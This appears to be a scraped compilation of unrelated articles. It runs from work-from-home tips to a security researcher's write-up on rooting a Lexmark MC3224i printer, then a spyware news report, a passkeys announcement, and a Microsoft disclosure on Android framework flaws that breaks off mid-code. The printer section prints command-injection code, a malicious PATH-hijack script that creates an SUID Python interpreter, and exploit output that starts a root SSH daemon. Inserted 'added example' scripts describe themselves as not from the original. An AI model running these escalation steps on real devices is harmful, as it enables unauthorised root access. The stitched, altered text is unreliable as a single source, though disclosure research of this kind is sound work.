Unfortunately, it’s hard to find things to help you reach that level of busyness when you’re at home — your motivation can just swing so easily. HubSpot’s principal marketing manager, Pam Vaughan, suggests focusing on something that maintains your rhythm (in her case, it’s her daughter).

She says, “When I work from home, my 20-month-old daughter is home with me, too. It seems counterintuitive, but because I have to manage taking care of her and keeping her happy and entertained while still getting my work done, the pressure helps to keep me focused. When she’s napping or entertaining herself, I go into super-productive work mode.

The ‘distraction’ of my daughter (I mean that in the most loving way possible) means I can’t possibly succumb to some of the other common distractions of home.”

11. Plan out what you’ll be working on ahead of time.

Spending time figuring out what you’ll do today can take away from actually doing those things. And, you’ll have planned your task list so recently that you can be tempted to change your schedule on the fly.

It’s important to let your agenda change if you need it to, but it’s equally important to commit to a schedule that outlines every assignment before you begin.

Try solidifying your schedule the day before, making it feel more official when you wake up the next day to get started on it.

“Plan out your week in advance to optimize for the environments you’ll be in.” – Niti Shah

12. Use technology to stay connected.

Working from home might make you feel cut off from the larger operation happening in your company.

Instant messaging and videoconferencing tools like Slack and Zoom can make it easy to check in with other remote employees and remind you how your work contributes to the big picture.

It’s also vital to invest in the right technology. For instance, a poorly performing router can take the steam right out of your enthusiasm to work, so it’s better to invest in a high-performance router.

CMO and former HubSpot employee, Meghan Keaney Anderson, remarks, “At HubSpot, we use Slack to keep conversations going remotely, Trello to keep us organized around priorities, and Google Hangouts plus Webex to make remote meetings more productive. Getting the right stack of support tools to fit your work style makes a big difference.”

13. Match your music to the task at hand.

During the week, music is the soundtrack to your career (cheesy, but admit it, it’s true). And at work, the best playlists are diverse playlists — you can listen to music that matches the energy of the project you’re working on to boost your productivity.

Video game soundtracks are excellent at doing this. In the video game, the lyric-free music is designed to help you focus; it only makes sense that it would help you focus on your work.

Want some other genres to spice up your routine and make you feel focused? Take them from startup marketer, Ginny Mineo, who offers her work music preferences below.

“When I’m powering through my inbox, I need some intense and catchy rap/R&B (like Nicki Minaj or Miley Cyrus) blasting through my headphones, but when I’m writing, Tom Petty is the trick. Finding what music motivates and focuses me for different tasks (and then sticking to those playlists for those tasks) has completely changed my WFH productivity.”

14. Use laundry as a work timer.

You might have heard that listening to just two or three songs in the shower can help you save water. And it’s true; hearing a few of your favorite songs start and end, one after another, can remind you how long you’ve been in the bathroom and shorten your wash time.

Why bring this up? Because the same general principle can help you stay on task when working from home. But instead of three songs off your music playlist, run your laundry instead.

Doing your laundry is a built-in timer for your home. So, use the time to start and finish something from your to-do list before changing the load.

Committing to one assignment during the wash cycle and another during the dry process can train you to work smarter on tasks that you might technically have all day to tinker with. And when you know there’s a timer, it makes it hard for distractions to derail your work.

People ops manager, Emma Brudner, notes, “I also usually do laundry when I work from home, and I set mini-deadlines for myself corresponding to when I have to go downstairs to switch loads. If I’m working on an article, I tell myself I’ll get to a certain point before the wash cycle ends. Then I set another goal for the dryer.”

Staying Productive While Working From Home

While you might miss the office, working full time from home can be good for you.

For one, you don’t have to worry about commuting every day and you can better care for your loved ones by being around more often.

The work from home tips that we have provided can help you make the most of your new routine. Try out a few and you might find that you’re just as productive working from home as you are in the office.


Source:
https://blog.hubspot.com/marketing/productivity-tips-working-from-home

For the Common Good: How to Compromise a Printer in Three Simple Steps

In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.

After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.

In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.

Overview

Product: Lexmark MC3224
Affected Firmware Versions (without claim for completeness): CXLBL.075.272 (2021-07-29), CXLBL.075.281 (2021-10-14)
Fixed Firmware Version: CXLBL.076.294 (CVE-2021-44735). Note: Users must implement a workaround to address CVE-2021-44736, see Lexmark Security Alert
CVE: CVE-2021-44735 (Shell Command Injection), CVE-2021-44736 (Authentication Reset)
Root Causes: Authentication Bypass, Shell Command Injection, Insecure SUID Binary
Impact: Unauthenticated Remote Code Execution (RCE) as root
Researchers: Hanno Heinrichs, Lukas Kupczyk
Lexmark Resources: https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44735.pdf, https[:]//publications.lexmark[.]com/publications/security-alerts/CVE-2021-44736.pdf

Step #1: Increasing Attack Surface via Authentication Reset

Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.

It was assumed that the printer would be in a default configuration during the contest and that the setup wizard on the printer had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a large number of actions through the web interface. One of these is “Sanitize all information on nonvolatile memory,” found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:

[x] Sanitize all information on nonvolatile memory
  (x) Start initial setup wizard
  ( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings

[Start] [Reset]

If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.

Step #2: Shell Command Injection

After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.

At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables such as interface, dest, path and filter are extracted from that data by using sed:

read data

remove=${data/*-r*/1}
if [ "x${remove}" != "x1" ]; then
    remove=0
fi
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
dest=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
path=$(echo ${data} | sed -n 's|^.*-f[[:space:]]\([^[:space:]]\+\).*$|\1|p')
method="startSniffer"
auto=0
if [ "x${dest}" = "x/dev/null" ]; then
    method="stopSniffer"
elif [ "x${dest}" = "x/usr/bin" ]; then
    auto=1
fi
filter=$(echo ${data} | sed -n 's|^.*-F[[:space:]]\+\(["]\)\(.*\)\1.*$|\2|p')
args="-i ${interface} -f ${dest}/sniff_control.pcap"

The variable filter is determined by a quoted string following the value -F specified in the POST body. As shown below, it is later embedded into the args variable in case it has been specified along with an interface:

fmt=""
args=""
if [ ${remove} -ne 0 ]; then
    fmt="${fmt}b"
    args="${args} remove 1"
fi
if [ -n "${interface}" ]; then
    fmt="${fmt}s"
    args="${args} interface ${interface}"
    if [ -n "${filter}" ]; then
        fmt="${fmt}s"
        args="${args} filter \"${filter}\""
    fi
    if [ ${auto} -ne 0 ]; then
        fmt="${fmt}b"
        args="${args} auto 1"
    else
        fmt="${fmt}s"
        args="${args} dest ${dest}"
    fi
fi
[...]

At the end of the script, the resulting args value is used in an eval statement:

[...]
resp=""
if [ -n "${fmt}" ]; then
    resp=$(eval rob call system.sniffer ${method} "{${fmt}}" ${args:1} 2>/dev/null)
    submitted=1
[...]

By controlling the filter variable, attackers are therefore able to inject further shell commands and gain access to the printer as uid=985(httpd), which is the user that the web server is executed as.
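As an added example (not the firmware's own code), the argument-building part of sniffcapture_post rewritten the way a code reviewer would have asked for: every field extracted from the POST body is checked against a character allowlist, and the backend command line is built as separate argv words instead of a string handed to eval. The allowlists are an assumption about what a capture filter and an interface name legitimately need, and because the printer's rob backend is not available here, the last step prints the argv words instead of calling it.

```shell
#!/bin/sh
# Added example, not code from the Lexmark firmware: hardened replacement for
# the filter/interface handling of sniffcapture_post. Two changes compared to
# the original: (1) each extracted field must pass a character allowlist,
# (2) the backend arguments are kept as distinct words ("$@"), so there is no
# quoting round trip and no eval for an injected payload to reach.

# Bracket expressions naming every character that is NOT acceptable. Shell
# metacharacters (; $ ` " \ | & ( ) < > and newline) are outside the allowlist.
# Assumption: a BPF-style capture filter only needs these characters.
FILTER_DISALLOWED='[!A-Za-z0-9._:/= -]'
# Interface names: letters, digits, dot, underscore, dash.
IFACE_DISALLOWED='[!A-Za-z0-9._-]'

# field_is_safe VALUE BRACKET_EXPR: succeeds when VALUE is non-empty and has no
# character matched by BRACKET_EXPR. A parameter expanded inside a case pattern
# is not field-split, so the space inside the class is safe.
field_is_safe() {
    case $1 in
        '') return 1 ;;
        *$2*) return 1 ;;
    esac
    return 0
}

# Same extraction rules as the original script: the word after "-i", and the
# text between the first and the last double quote after "-F".
extract_interface() {
    printf '%s\n' "$1" | sed -En 's/^.*-i[[:space:]]+([^[:space:]]+).*$/\1/p'
}
extract_filter() {
    printf '%s\n' "$1" | sed -En 's/^.*-F[[:space:]]+"(.*)".*$/\1/p'
}

# build_sniffer_args POST_BODY: prints one backend argument per line (stand-in
# for "rob call system.sniffer", which does not exist outside the printer).
# Exit status: 0 = ok, 1 = no interface given, 2 = a field failed validation.
build_sniffer_args() {
    sniff_iface=$(extract_interface "$1")
    sniff_filter=$(extract_filter "$1")
    [ -n "$sniff_iface" ] || return 1
    field_is_safe "$sniff_iface" "$IFACE_DISALLOWED" || return 2
    set -- interface "$sniff_iface"
    if [ -n "$sniff_filter" ]; then
        field_is_safe "$sniff_filter" "$FILTER_DISALLOWED" || return 2
        # The filter stays a single argv word; nothing re-parses it as shell.
        set -- "$@" filter "$sniff_filter"
    fi
    printf '%s\n' "$@"
}
```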

Step #3: Privilege Escalation

The printer ships a custom root-owned SUID binary called collect-selogs-wrapper:

# ls -la usr/bin/collect-selogs-wrapper
-rwsr-xr-x. 1 root root 7324 Jun 14 15:46 usr/bin/collect-selogs-wrapper

In its main() function, the effective user ID (0) is retrieved and the process’s real user ID is set to that value. Afterward, the shell script /usr/bin/collect-selogs.sh is executed:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __uid_t euid; // r0

  euid = geteuid();
  if ( setuid(euid) )
    perror("setuid");
  return execv("/usr/bin/collect-selogs.sh", (char *const *)argv);
}

Effectively, the shell script is executed as root with UID=EUID, and therefore the shell does not drop privileges. Furthermore, argv[] of the SUID binary is passed to the shell script. As the environment variables are also retained across the execv() call, an attacker is able to specify a malicious $PATH value. Any command inside the shell script that is not referenced by its absolute path can thereby be detoured by the attacker.

The first opportunity for such an attack is the invocation of systemd-cat inside sd_journal_print():

# cat usr/bin/collect-selogs.sh
#!/bin/sh
# Collects fwdebug from the current state plus the last 3 fwdebug files from
# previous auto-collections. The collected files will be archived and compressed
# to the requested output directory or to the standard output if the output
# directory is not specified.

sd_journal_print() {
    systemd-cat -t collect-selogs echo "$@"
}

sd_journal_print "Start! params: '$@'"

[...]

The /dev/shm directory can be used to prepare a malicious version of systemd-cat:

$ cat /dev/shm/systemd-cat
#!/bin/sh
mount -o remount,suid /dev/shm
cp /usr/bin/python3 /dev/shm
chmod +s /dev/shm/python3
$ chmod +x /dev/shm/systemd-cat

This script remounts /dev/shm with the suid flag so that SUID binaries can be executed from it. It then copies the system’s Python interpreter to the same directory and enables the SUID bit on it. The malicious systemd-cat copy can be executed as root by invoking the setuid collect-selogs-wrapper binary like this:

$ PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper

The $PATH environment variable is prepended with the /dev/shm directory that hosts the malicious systemd-cat copy. After executing the command, a root-owned SUID-enabled copy of the Python interpreter is located in /dev/shm:

root@ET788C773C9E20:~# ls -la /dev/shm
drwxrwxrwt    2 root     root           100 Oct 29 09:33 .
drwxr-xr-x   13 root     root          5160 Oct 29 09:31 ..
-rwsr-sr-x    1 root     httpd         8256 Oct 29 09:33 python3
-rw-------    1 nobody   nogroup         16 Oct 29 09:31 sem.netapps.rawprint
-rwxr-xr-x    1 httpd    httpd           96 Oct 29 09:33 systemd-cat

The idea behind this technique is to establish a simple way of escalating privileges without having to exploit the initial collect-selogs-wrapper SUID binary again. We did not use the Bash binary for this, as the version shipped with the printer seems to ignore the -p flag when running with UID!=EUID.
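As an added example (not part of the CrowdStrike write-up), a PATH audit a defender can run on a device to see what a root-running wrapper such as collect-selogs-wrapper exposes when it hands its script the caller's environment unchanged: it lists every PATH entry an unprivileged user could populate with a look-alike binary, i.e. empty or relative entries and world-writable directories such as /dev/shm. The real fix is for the wrapper to exec the script with a fixed environment; the audit only makes the inherited-PATH risk visible.

```shell
#!/bin/sh
# Added example, not part of the original write-up: audit a PATH value for
# entries that an unprivileged local user controls. Relies only on ls -ld and
# cut, which BusyBox provides, so it also works on an embedded system.

# dir_mode_string DIR: print the 10-character mode string of a directory, e.g.
# "drwxrwxrwt" for /dev/shm. Fails (prints nothing) if DIR is not a directory.
dir_mode_string() {
    [ -d "$1" ] || return 1
    ls -ld "$1" | cut -c1-10
}

# untrusted_path_entries PATH_VALUE: print each untrusted entry as
# "<entry><TAB><reason>". Returns 0 if all entries are trusted, 1 otherwise.
# Entries that do not exist are ignored; a missing directory cannot be
# populated unless its parent is writable, which is outside this check.
untrusted_path_entries() {
    audit_bad=0
    audit_rest="$1:"        # trailing ':' lets the loop consume the last entry
    while [ -n "$audit_rest" ]; do
        audit_entry=${audit_rest%%:*}
        audit_rest=${audit_rest#*:}
        case $audit_entry in
            '' | [!/]*)
                # "" and "." both resolve against the caller's current directory
                printf '%s\trelative or empty entry\n' "$audit_entry"
                audit_bad=1 ;;
            *)
                audit_mode=$(dir_mode_string "$audit_entry") || audit_mode=""
                case $audit_mode in
                    d???????w?)   # 9th character: write permission for "other"
                        printf '%s\tworld-writable directory\n' "$audit_entry"
                        audit_bad=1 ;;
                esac ;;
        esac
    done
    return $audit_bad
}
```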

Exploit

An exploit combining the three vulnerabilities to gain unauthenticated code execution as root has been implemented as a Python script. First, the exploit tries to determine whether the printer has a login password set (i.e., the setup wizard has been completed) or it is password-less (i.e., the authentication reset was already executed earlier or the setup wizard has not yet been completed). Depending on the result, it decides whether the non-volatile memory reset is required.

If the non-volatile memory reset is triggered, the exploit waits for the printer to finish rebooting. Afterward, it continues with the shell command injection step and escalation of privileges. The privileged access is then used to start an OpenSSH daemon on the printer. To finish, the exploit establishes an interactive SSH session with the printer and hands control over to the user. An example run of the exploit in a testing environment follows:

$ ./mc3224i_exploit.py https://10.64.23.20/ sshd
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM', 'LOGIN_METHODS_WITH_CREDS']
[*] Device IS password protected, auth bypass required
[*] Erasing nvram...
[+] Success! HTTP status: 200, rc=1
[*] Waiting for printer to reboot, sleeping 5 seconds...
[*] Checking status...
xxxxxxxxxxxxxxxxxxxxxxx!
[+] Reboot finished
[*] Probing device...
[+] Firmware: CXLBL.075.281
[+] Acceptable login methods: ['LDAP_DEVICE_REALM']
[*] Device IS NOT password protected
[+] Authentication bypass done
[*] Attempting to escalate privileges...
[*] Executing command (root? False):
    echo -e '#!/bin/sh\\n
    mount -o remount,suid /dev/shm\\n
    cp /usr/bin/python3 /dev/shm\\nchmod +s /dev/shm/python3' >
    /dev/shm/systemd-cat; chmod +x /dev/shm/systemd-cat
[+] HTTP status: 200
[*] Executing command (root? False): PATH=/dev/shm:$PATH /usr/bin/collect-selogs-wrapper
[+] request timed out, that’s what we expect
[+] SUID Python interpreter should be created
[*] Attempting to enable SSH daemon...
[*] Executing command (root? True):
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\1/g'
    -e 's/AllowUsers guest/AllowUsers root guest/'
    /etc/ssh/sshd_config_perf > /tmp/sshconf;
    mkdir /var/run/sshd;
    iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT;
    nohup /usr/sbin/sshd -f /tmp/sshconf &
[+] HTTP status: 200
[+] SSH daemon should be running
[*] Trying to call ssh... ('ssh', '-i', '/tmp/tmpd2vc5a2u', 'root@10.64.23.20')
root@ET788C773C9E20:~# id
uid=0(root) gid=0(root) groups=0(root)

Summary

In this blog, we described a number of vulnerabilities that can be exploited from the local network to bypass authentication, execute arbitrary shell commands, and elevate privileges on a Lexmark MC3224i printer. The research started as an experiment after the announcement of the Pwn2Own Austin 2021. The team enjoyed the challenge, as well as participating in Pwn2Own for the first time, and we welcome your feedback. We’d also like to invite you to read about the other device we successfully targeted during Pwn2Own Austin 2021, the Cisco RV340 router.

Additional Resources

Google Says ISPs Helped Attackers Infect Targeted Smartphones with Hermit Spyware

A week after it emerged that a sophisticated mobile spyware dubbed Hermit was used by the government of Kazakhstan within its borders, Google said it has notified Android users of infected devices.

Additionally, necessary changes have been implemented in Google Play Protect — Android’s built-in malware defense service — to protect all users, Benoit Sevens and Clement Lecigne of Google Threat Analysis Group (TAG) said in a Thursday report.

Hermit, the work of an Italian vendor named RCS Lab, was documented by Lookout last week, calling out its modular feature-set and its abilities to harvest sensitive information such as call logs, contacts, photos, precise location, and SMS messages.

Once the threat has thoroughly insinuated itself into a device, it’s also equipped to record audio and make and redirect phone calls, in addition to abusing its permissions to accessibility services to keep tabs on the foreground apps used by the victims.

Its modularity also enables it to be wholly customizable, equipping the spyware’s functionality to be extended or altered at will. It’s not immediately clear who were targeted in the campaign, or which of RCS Lab clients were involved.

The Milan-based company, operating since 1993, claims to provide “law enforcement agencies worldwide with cutting-edge technological solutions and technical support in the field of lawful interception for more than twenty years.” More than 10,000 intercepted targets are purported to be handled daily in Europe alone.

“Hermit is yet another example of a digital weapon being used to target civilians and their mobile devices, and the data collected by the malicious parties involved will surely be invaluable,” Richard Melick, director of threat reporting for Zimperium, said.

The targets have their phones infected with the spy tool via drive-by downloads as initial infection vectors, which, in turn, entails sending a unique link in an SMS message that, upon clicking, activates the attack chain.

It’s suspected that the actors worked in collaboration with the targets’ internet service providers (ISPs) to disable their mobile data connectivity, followed by sending an SMS that urged the recipients to install an application to restore mobile data access.

“We believe this is the reason why most of the applications masqueraded as mobile carrier applications,” the researchers said. “When ISP involvement is not possible, applications are masqueraded as messaging applications.”

To compromise iOS users, the adversary is said to have relied on provisioning profiles that allow fake carrier-branded apps to be sideloaded onto the devices without the need for them to be available on the App Store.


An analysis of the iOS version of the app shows that it leverages as many as six exploits — CVE-2018-4344, CVE-2019-8605, CVE-2020-3837, CVE-2020-9907, CVE-2021-30883, and CVE-2021-30983 — to exfiltrate files of interest, such as WhatsApp databases, from the device.

“As the curve slowly shifts towards memory corruption exploitation getting more expensive, attackers are likely shifting too,” Google Project Zero’s Ian Beer said in a deep-dive analysis of an iOS artifact that impersonated the My Vodafone carrier app.

On Android, the drive-by attacks require that victims enable a setting to install third-party applications from unknown sources; once installed, the rogue app, masquerading as an app from a smartphone brand like Samsung, requests extensive permissions to achieve its malicious goals.

The Android variant, besides attempting to root the device for entrenched access, is also wired differently in that instead of bundling exploits in the APK file, it contains functionality that permits it to fetch and execute arbitrary remote components that can communicate with the main app.

“This campaign is a good reminder that attackers do not always use exploits to achieve the permissions they need,” the researchers noted. “Basic infection vectors and drive by downloads still work and can be very efficient with the help from local ISPs.”

Stating that seven of the nine zero-day exploits it discovered in 2021 were developed by commercial providers and sold to and used by government-backed actors, the tech behemoth said it’s tracking more than 30 vendors with varying levels of sophistication who are known to trade exploits and surveillance capabilities.

What’s more, Google TAG raised concerns that vendors like RCS Lab are “stockpiling zero-day vulnerabilities in secret” and cautioned that this poses severe risks considering a number of spyware vendors have been compromised over the past ten years, “raising the specter that their stockpiles can be released publicly without warning.”

“Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments with the technical expertise to develop and operationalize exploits,” TAG said.

“While use of surveillance technologies may be legal under national or international laws, they are often found to be used by governments for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers and opposition party politicians.”

Source :
https://thehackernews.com/2022/06/google-says-isps-helped-attackers.html

Expansion of FIDO standard and new updates for Microsoft passwordless solutions

Howdy folks, 

Happy World Password Day! Today, I’m super excited to share some great news with you: Together, with the FIDO Alliance and other major platforms, Microsoft has announced support for the expansion of a common passwordless standard created by the FIDO Alliance and the World Wide Web consortium. These multi-device FIDO credentials, sometimes referred to as passkeys, represent a monumental step toward a world without passwords. We also have some great updates coming to our passwordless solutions in Azure Active Directory (Azure AD) and Windows that will expand passwordless to more use cases. 

Passwords have never been less adequate for protecting our digital lives. As Vasu Jakkal reported earlier today, there are over 921 password attacks every second. Lots of attackers want your password and will keep trying to steal it from you. It’s better for everyone if we just cut off their supply. 

Replacing passwords with passkeys 

Passkeys are a safer, faster, easier replacement for your password. With passkeys, you can sign in to any supported website or application by simply verifying your face, fingerprint or using a device PIN. Passkeys are fast, phish-resistant, and will be supported across leading devices and platforms. Your biometric information never leaves the device and passkeys can even be synced across devices on the same platform – so you don’t need to enroll each device and you’re protected in case you upgrade or lose your device. You can use Windows Hello today to sign in to any site that supports passkeys, and in the near future, you’ll be able to sign in to your Microsoft account with a passkey from an Apple or Google device.  

We enthusiastically encourage website owners and app developers to join Microsoft, Apple, Google, and the FIDO Alliance to support passkeys and help realize our vision of a truly passwordless world.  


Going passwordless 

We’re proud to have been one of the earliest supporters of the FIDO standards, including FIDO2 certification for Windows Hello. We’re thrilled to evolve the FIDO standards ecosystem to support passkeys and that passwordless authentication continues to gain momentum. 

Since we started introducing passwordless sign-in nearly 5 years ago, the number of people across Microsoft services signing in each month without using their password has reached more than 240 million. And in the last six months, over 330,000 people have taken the next step of removing the password from their Microsoft Account. After all, you’re completely safe from password-based attacks if you don’t have one. 

Today, we’re also announcing new capabilities that will make it easier for enterprises to go completely passwordless: 

Passwordless for Windows 365, Azure Virtual Desktop, and Virtual Desktop Infrastructure 

Now that remote or hybrid work is the new norm, lots more people are using a remote or virtualized desktop to get their work done. And now, we’ve added passwordless support for Windows 365, Azure Virtual Desktop, and Virtual Desktop Infrastructure. This is currently in preview with Windows 11 Insiders, and is on the way for Windows 10 as well.  

Windows Hello for Business Cloud Trust  

Windows Hello for Business Cloud Trust simplifies the deployment experience of Windows Hello for hybrid environments. This new deployment model removes previous requirements for public key infrastructure (PKI) and syncing public keys between Azure AD and on-premises domain controllers. This improvement eliminates delays between users provisioning Windows Hello for Business and being able to authenticate and makes it easier than ever to use Windows Hello for Business for accessing on-premises resources and applications. Cloud Trust is now available in preview for Windows 10 21H2 and Windows 11 21H2. 

Multiple passwordless accounts in Microsoft Authenticator 

When we first introduced passwordless sign-in for Azure AD (work or school accounts), Microsoft Authenticator could only support one passwordless account at a time. Now that limitation has been removed and you can have as many as you want. iOS users will start to see this capability later this month and the feature will be available on Android afterwards.  

Passwordless phone sign-in experience in Microsoft Authenticator for Azure AD accounts.

Temporary Access Pass in Azure AD 

Temporary Access Pass in Azure AD, a time-limited passcode, has been a huge hit with enterprises since the public preview, and we’ve been adding more ways to use it as we prepare to release the feature this summer. Lots of customers have told us they want to distribute Temporary Access Passes instead of passwords for setting up new Windows devices. You’ll be able to use a Temporary Access Pass to sign in for the first time, to configure Windows Hello, and to join a device to Azure AD. This update will be available next month. 

End user experience for Temporary Access Pass in Windows 11 onboarding.

Customers implementing passwordless today 

We already have several great examples of large Microsoft customers implementing passwordless solutions, including Avanade, who went passwordless with help from Feitian to protect their clients’ data against security breaches. Amedisys, a home healthcare and hospice care provider, went passwordless to keep patient personal information secured. Both organizations are committed to using passwordless authentication not only to strengthen security, but also to make the sign-in experience easier for end users. 

We’d love to hear your feedback, so please leave a comment, check out the documentation, and visit aka.ms/gopasswordless for more information. 

Best regards,  

Alex Simons (Twitter: @Alex_A_Simons)

Corporate Vice President of Program Management 

Microsoft Identity Division 

Source :
https://techcommunity.microsoft.com/t5/azure-active-directory-identity/expansion-of-fido-standard-and-new-updates-for-microsoft/ba-p/3290633

Android apps with millions of downloads exposed to high-severity vulnerabilities

Microsoft uncovered high-severity vulnerabilities in a mobile framework owned by mce Systems and used by multiple large mobile service providers in pre-installed Android System apps that potentially exposed users to remote (albeit complex) or local attacks. The vulnerabilities, which affected apps with millions of downloads, have been fixed by all involved parties. Coupled with the extensive system privileges that pre-installed apps have, these vulnerabilities could have been attack vectors for attackers to access system configuration and sensitive information.

As with many of the pre-installed or default applications that most Android devices come with these days, some of the affected apps cannot be fully uninstalled or disabled without gaining root access to the device. We worked with mce Systems, the developer of the framework, and the affected mobile service providers to solve these issues. We commend the quick and professional resolution from the mce Systems engineering teams, as well as the relevant providers, in fixing each of these issues, ensuring that users can continue using such a crucial framework.

Collaboration among security researchers, software vendors, and the security community is important to continuously improve defenses for the larger ecosystem. As the threat and computing landscape continues to evolve, vulnerability discoveries, coordinated response, and other forms of threat intelligence sharing are paramount to protecting customers against present and future threats, regardless of the platform or device they are using.

Uncovering the vulnerabilities

Our research on the framework vulnerabilities began while trying to better understand how a pre-installed System application could affect the overall security of mobile devices. We discovered that the framework, which is used by numerous apps, had a “BROWSABLE” service activity that an attacker could remotely invoke to exploit several vulnerabilities that could allow adversaries to implant a persistent backdoor or take substantial control over the device.

The framework seemed to be designed to offer self-diagnostic mechanisms to identify and resolve issues impacting the Android device, indicating its permissions were inherently broad with access to valuable resources. For example, the framework was authorized to access system resources and perform system-related tasks, like adjusting the device’s audio, camera, power, and storage controls. Moreover, we found that the framework was being used by default system applications to leverage its self-diagnostic capabilities, demonstrating that the affiliated apps also included extensive device privileges that could be exploited via the vulnerable framework.

According to mce Systems, some of these vulnerabilities also affected other apps on both Android and iOS devices. Moreover, the vulnerable framework and affiliated apps were found on devices from large international mobile service providers. mce Systems, which offers “Mobile Device Lifecycle and Automation Technologies,” also permitted providers to customize and brand their respective mobile apps and frameworks. Pre-installed frameworks and mobile apps such as mce Systems’ are beneficial to users and providers in areas like simplifying the device activation process, troubleshooting device issues, and optimizing performance. However, their extensive control over the device to deliver these kinds of services could also make them an attractive target for attackers. 

Our analysis further found that the apps were embedded in the devices’ system image, suggesting that they were default applications installed by phone providers. All of the apps are available on the Google Play Store where they go through Google Play Protect’s automatic safety checks, but these checks previously did not scan for these types of issues. As part of our effort to help ensure broad protection against these issues, we shared our research with Google, and Google Play Protect now identifies these types of vulnerabilities.

We initially discovered the vulnerabilities in September 2021 and shared our findings with mce Systems and affected mobile service providers through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR). We worked closely with mce Systems’ security and engineering teams to mitigate these vulnerabilities, which included mce Systems sending an urgent framework update to the impacted providers and releasing fixes for the issues. At the time of publication, there have been no reported signs of these vulnerabilities being exploited in the wild.

The high-severity vulnerabilities, which have a Common Vulnerability Scoring System (CVSS) score of 7.0-8.9, are now identified as CVE-2021-42598, CVE-2021-42599, CVE-2021-42600, and CVE-2021-42601. We want to thank mce Systems’ engineering teams for collaborating quickly and efficiently in resolving these issues, as well as AT&T for proactively working with Microsoft to ensure customers can safely continue to use the framework.

Several other mobile service providers were found using the vulnerable framework with their respective apps, suggesting that there could be additional providers still undiscovered that may be impacted. The affected providers linked below have made updated app versions available to users before this disclosure, ensuring devices can be protected before these vulnerabilities could be exploited. We encourage these providers’ customers to update to the latest versions of these apps from the Google Play store, which include but are not limited to: com.telus.checkup, com.att.dh, com.fivemobile.myaccount, com.freedom.mlp,uat, and com.ca.bell.contenttransfer.

Additionally, the package com.mce.mceiotraceagent might be installed by several mobile phone repair shops. Mobile users are advised to look for that app name and remove it from their phone, if found.

Analyzing apps that use the mce framework

App manifest and permissions

When analyzing an Android application, the first thing that comes to mind is checking its manifest, maintained under the AndroidManifest.xml file. The manifest describes the application itself and its components, such as the following:

  • Permissions (for example, camera access, internet access, and others)
  • Activities and how they respond to Intents sent to them
  • Content providers
  • Receivers and the kind of content they expect to receive
  • Services

Checking the manifest of an app affiliated with mce Systems’ framework shed light on some of its features and capabilities but did not immediately indicate that any vulnerabilities or security issues were present. Therefore, further research into the app’s functionality was needed by understanding its permissions.

Analysis of the app’s permissions on the mobile device revealed authorizations that could lead to powerful access and capabilities for an attacker. Those permissions included control over the following:

  • Networking: access the internet, modify Wi-Fi state, network state, NFC, and Bluetooth
  • File access: read and write to the external storage
  • Peripherals: access the camera, record audio, get fingerprint information, and get the device’s physical location
  • Private information: read phone numbers, account information, and contacts
  • Management: install apps and modify device settings

With access to these valuable resources, the app could be abused by an attacker to implant a persistent backdoor on the device.

BROWSABLE activities

The “Activities” section of the app’s manifest detailed that the Intent-filter element included activities with a “BROWSABLE” category. While most Intents do not require a category, category strings detail the components that should handle the Intent. In particular, the BROWSABLE category allows the target Activity to be triggered from a web browser to display data referenced by a link, like an image. BROWSABLE activities appeal to attackers as the latter can exploit them via malicious web pages and other Intent-based attacks.

Figure 1:  BROWSABLE Activity with the “mcedigital://” scheme

The Intent-filter element in the manifest dictates how the Activity can be triggered. In the app’s case, the Activity could be triggered by simply clicking a link with the “mcedigital://” scheme. This would start the com.mce.sdk.AppActivity Activity with an Intent with arbitrary data (besides the scheme).
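The two manifest checks described above (the permission inventory and the BROWSABLE activity with a custom scheme) are easy to automate. The following is an added example, not part of the Microsoft research or the mce framework: a Python audit script that parses a constructed AndroidManifest.xml modelled on the description of the affected app (package name, activity name and the `exampledigital` scheme are made up) and reports the permissions on a watch-list of this example's own choosing plus every activity reachable through a BROWSABLE intent filter.

```python
"""Audit an AndroidManifest.xml for high-impact permissions and for
activities that a web page can launch (BROWSABLE intent filters).

Added example, not code from the original research. The manifest below is
constructed for illustration; the permission watch-list is this example's
own choice, grouped the way the permission summary above groups them.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest modelled on the described app (names are invented).
SAMPLE_MANIFEST = """\
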